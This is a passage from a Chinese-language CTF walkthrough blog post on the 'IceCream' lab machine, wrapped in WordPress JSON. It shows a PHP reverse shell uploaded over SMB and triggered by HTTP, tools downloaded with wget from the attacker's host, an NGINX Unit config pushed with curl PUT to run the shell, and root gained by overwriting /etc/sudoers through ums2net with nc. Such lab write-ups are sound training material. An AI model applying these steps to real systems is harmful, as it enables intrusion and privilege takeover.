systemd-private-04c229acaa5c413b8608357c75eae31f-systemd-logind.service-fuqSuC      D        0  Wed Oct  9 03:15:49 2024\n  .font-unix                         DH        0  Wed Oct  9 03:15:48 2024\n  systemd-private-04c229acaa5c413b8608357c75eae31f-systemd-timesyncd.service-UeLq7f      D        0  Wed Oct  9 03:15:48 2024\n  .XIM-unix                          DH        0  Wed Oct  9 03:15:48 2024\n  .ICE-unix                          DH        0  Wed Oct  9 03:15:48 2024\n  .X11-unix                          DH        0  Wed Oct  9 03:15:48 2024\n\n                19480400 blocks of size 1024. 16156948 blocks available\nsmb: \\&gt; pwd\nCurrent directory is \\\\192.168.10.101\\ICECREAM\\\nsmb: \\&gt; help\n?              allinfo        altname        archive        backup         \nblocksize      cancel         case_sensitive cd             chmod          \nchown          close          del            deltree        dir            \ndu             echo           exit           get            getfacl        \ngeteas         hardlink       help           history        iosize         \nlcd            link           lock           lowercase      ls             \nl              mask           md             mget           mkdir          \nmore           mput           newer          notify         open           \nposix          posix_encrypt  posix_open     posix_mkdir    posix_rmdir    \nposix_unlink   posix_whoami   print          prompt         put            \npwd            q              queue          quit           readlink       \nrd             recurse        reget          rename         reput          \nrm             rmdir          showacls       setea          setmode        \nscopy          stat           symlink        tar            tarmode        \ntimeout        translate      unlock         volume         vuid           \nwdel           logon          listconnect    showconnect    tcon           \ntdis           tid            utimes         logoff         ..             \n!              \nsmb: \\&gt; put revshell.php \nputting file revshell.php as \\revshell.php (764.0 kb\/s) (average 764.1 kb\/s)\nsmb: \\&gt; ls\n  .                                   D        0  Wed Oct  9 03:47:43 2024\n  ..                                  D        0  Sun Oct  6 06:06:38 2024\n  systemd-private-04c229acaa5c413b8608357c75eae31f-systemd-logind.service-fuqSuC      D        0  Wed Oct  9 03:15:49 2024\n  .font-unix                         DH        0  Wed Oct  9 03:15:48 2024\n  systemd-private-04c229acaa5c413b8608357c75eae31f-systemd-timesyncd.service-UeLq7f      D        0  Wed Oct  9 03:15:48 2024\n  .XIM-unix                          DH        0  Wed Oct  9 03:15:48 2024\n  .ICE-unix                          DH        0  Wed Oct  9 03:15:48 2024\n  .X11-unix                          DH        0  Wed Oct  9 03:15:48 2024\n  revshell.php                        A     3912  Wed Oct  9 03:47:43 2024\n\n                19480400 blocks of size 1024. 16156944 blocks available<\/code><\/pre>\n<p>\u7136\u540e\u8bbf\u95ee\u6fc0\u6d3b\u4e00\u4e0b\u5373\u53ef\uff01<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.10.101\/revshell.php<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130148.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130148.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241009161459668\" style=\"zoom:33%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@icecream:\/$ cd \/var\/tmp\n(remote) www-data@icecream:\/var\/tmp$ wget http:\/\/192.168.10.102:8888\/linpeas.sh\n(remote) www-data@icecream:\/var\/tmp$ wget http:\/\/192.168.10.102:8888\/pspy64\n(remote) www-data@icecream:\/var\/tmp$ chmod +x *<\/code><\/pre>\n<p>\u770b\u4e00\u4e0b\u6709\u5565\u4fe1\u606f\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130149.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130149.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241009164141742\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130151.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130151.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241009164246571\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130152.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130152.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241009164308129\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130153.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130153.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241009161930352\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130154.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130154.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241009162128630\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u6dfb\u52a0\u8def\u7531\u76d1\u542c\u63d0\u6743ice<\/h3>\n<p><code>Todd<\/code>\u5e08\u5085\u627e\u5230\u4e86\u4e00\u4e2a\u52a0\u8def\u7531\u7684\u529e\u6cd5\uff01\u5c1d\u8bd5\u6309\u56fe\u7d22\u9aa5\u4e00\u4e0b\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130155.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130155.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241009171301922\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u5b58\u5728\u4f7f\u7528PUT\u8fdb\u884c\u66f4\u65b0\u7684\u529e\u6cd5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130156.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130156.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241213101716225\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u6839\u636e\u5b98\u7f51\u4e0b\u9762\u7684\u6837\u4f8b\uff0c\u5c1d\u8bd5\u521b\u5efa\u4e00\u4e2a\u914d\u7f6e\u6587\u4ef6\u4e0a\u4f20\uff1a<\/p>\n<pre><code class=\"language-bash\">{\n    &quot;listeners&quot;: {\n        &quot;127.0.0.1:8080&quot;: {\n            &quot;pass&quot;: &quot;routes&quot;\n        }\n    },\n\n    &quot;routes&quot;: [\n        {\n            &quot;action&quot;: {\n                &quot;share&quot;: &quot;\/tmp\/revshell.php&quot;,\n                &quot;pass&quot;: &quot;applications\/shellapp&quot;\n            }\n        }\n    ],\n    &quot;applications&quot;: {\n    &quot;shellapp&quot;: {\n      &quot;type&quot;: &quot;php&quot;,\n      &quot;user&quot;: &quot;\/tmp&quot;,\n      &quot;index&quot;: &quot;revshell.php&quot;,\n      &quot;script&quot;: &quot;revshell.php&quot;\n    }\n  }\n}<\/code><\/pre>\n<p>\u7136\u540e\u62a5\u9519\u4e86\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130157.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130157.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241213105904745\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u73b0\u5c1d\u8bd5\u4f7f\u7528\u4e4b\u524d\u7684\u6743\u9650\uff0c\u8c03\u6574\u4e86\u4e00\u4e0b\uff0c\u5148\u4f7f\u7528\u4e4b\u524d\u7684\u6743\u9650\u5199\u5165\u7684shell\uff0c\u518d\u4f20\u914d\u7f6e\u6587\u4ef6\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130158.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130158.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241213110615527\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">{\n    &quot;listeners&quot;: {\n        &quot;127.0.0.1:8080&quot;: {\n            &quot;pass&quot;: &quot;routes&quot;\n        }\n    },\n\n    &quot;routes&quot;: [\n        {\n            &quot;action&quot;: {\n                &quot;pass&quot;: &quot;applications\/shellapp&quot;\n            }\n        }\n    ],\n    &quot;applications&quot;: {\n    &quot;shellapp&quot;: {\n      &quot;type&quot;: &quot;php&quot;,\n      &quot;user&quot;: &quot;\/tmp&quot;,\n      &quot;index&quot;: &quot;revshell.php&quot;,\n      &quot;script&quot;: &quot;revshell.php&quot;\n    }\n  }\n}<\/code><\/pre>\n<p>\u7136\u540e\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ curl -X PUT --data-binary @shell.json http:\/\/192.168.10.102:9000\/config\n{\n        &quot;error&quot;: &quot;Invalid configuration.&quot;,\n        &quot;detail&quot;: &quot;Required parameter \\&quot;root\\&quot; is missing.&quot;\n}<\/code><\/pre>\n<p>\u518d\u6b21\u4fee\u6539\uff1a<\/p>\n<pre><code class=\"language-bash\">{\n    &quot;listeners&quot;: {\n        &quot;127.0.0.1:8080&quot;: {\n            &quot;pass&quot;: &quot;routes&quot;\n        }\n    },\n\n    &quot;routes&quot;: [\n        {\n            &quot;action&quot;: {\n                &quot;pass&quot;: &quot;applications\/shellapp&quot;\n            }\n        }\n    ],\n    &quot;applications&quot;: {\n    &quot;shellapp&quot;: {\n      &quot;type&quot;: &quot;php&quot;,\n      &quot;root&quot;: &quot;\/tmp&quot;,\n      &quot;index&quot;: &quot;revshell.php&quot;,\n      &quot;script&quot;: &quot;revshell.php&quot;\n    }\n  }\n}<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ curl -X PUT --data-binary @shell.json http:\/\/192.168.10.102:9000\/config\n{\n        &quot;success&quot;: &quot;Reconfiguration done.&quot;\n}<\/code><\/pre>\n<p>\u7136\u540e\u65e0\u6cd5\u8bbf\u95ee\uff0c\u91cd\u542f\uff0c\u91cd\u65b0\u4e0a\u4f20shell\uff0c\u8c03\u6574\u4e86\u4e00\u4e0b\uff0c\u62ff\u4e0buser\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130159.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130159.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241213111715680\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130160.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130160.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241213111745358\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u63d0\u6743root<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130161.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130161.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241213112008892\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u67e5\u770b\u4e00\u4e0b\u8fd9\u662f\u5565\uff1a<\/p>\n<blockquote>\n<h1>USB Mass Storage to Network Proxy (ums2net)<\/h1>\n<p>ums2net provides a way for a user to connect from a network connection to a USB mass storage device.<\/p>\n<h2>Build<\/h2>\n<ol>\n<li>cmake .<\/li>\n<li>make<\/li>\n<\/ol>\n<h2>How to use ums2net<\/h2>\n<ol>\n<li>Insert the USB Mass Storage. Check \/dev\/disk\/by-id\/ for the unique path for that device.<\/li>\n<li>Create a config file base on the above path. Please see the config file format section.<\/li>\n<li>Run &quot;ums2net -c &quot;. ums2net will become a daemon in the background. For debugging please add &quot;-d&quot; option to avoid detach.<\/li>\n<li>Use nc to write your image to the USB Mass Storage device. For example, &quot;nc -N localhost 29543 &lt; warp7.img&quot;<\/li>\n<\/ol>\n<h2>Config file<\/h2>\n<p>Each line in the config file maps a TCP port to a device. All the options are separated by space. The first argument is a number represents the TCP port. And the rest of the arguments are in dd-style. For example,<\/p>\n<p>A line in the config file:<\/p>\n<pre><code>\"29543 of=\/dev\/disk\/by-id\/usb-Linux_UMS_disk_0_WaRP7-0x2c98b953000003b5-0:0 bs=4096\"<\/code><\/pre>\n<p>It means TCP port 29543 is mapped to \/dev\/disk\/by-id\/usb-Linux_UMS_disk_0_WaRP7-0x2c98b953000003b5-0:0 and the block size is 4096.<\/p>\n<p>Currently we only support &quot;of&quot; and &quot;bs&quot;.<\/p>\n<\/blockquote>\n<p>\u5199\u7684\u662fUSB\u901a\u8fc7tcp\u5171\u4eab\u6570\u636e\uff0c\u5c1d\u8bd5\u53cd\u8fc7\u6765\u8fdb\u884c\u4fee\u6539\u4e00\u4e0b<code>sudoers<\/code>\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-bash\">echo &quot;1234 of=\/etc\/sudoers bs=4096&quot; &gt; config\nsudo \/usr\/sbin\/ums2net -c config -d<\/code><\/pre>\n<p>\u7136\u540e\u672c\u5730\u901a\u8fc7nc\u4f20\u8fc7\u53bb\u5c31\u884c\u4e86\uff1a<\/p>\n<pre><code class=\"language-bash\">echo &#039;ice ALL=(ALL) NOPASSWD: ALL&#039; |nc $IP 1234<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130162.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130162.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241213113021298\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u62ff\u4e0broot\u3002<\/p>\n<h2>\u53c2\u8003<\/h2>\n<p><a href=\"https:\/\/blog.findtodd.com\/2024\/10\/09\/hmv-Icecream\">https:\/\/blog.findtodd.com\/2024\/10\/09\/hmv-Icecream<\/a><\/p>\n<p><a href=\"https:\/\/medium.com\/@josemlwdf\/icecream-bca574cf4a44\">https:\/\/medium.com\/@josemlwdf\/icecream-bca574cf4a44<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>IceCream \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream] \u2514\u2500$ [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-817","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/817","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=817"}],"version-history":[{"count":3,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/817\/revisions"}],"predecessor-version":[{"id":820,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/817\/revisions\/820"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=817"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=817"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=817"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}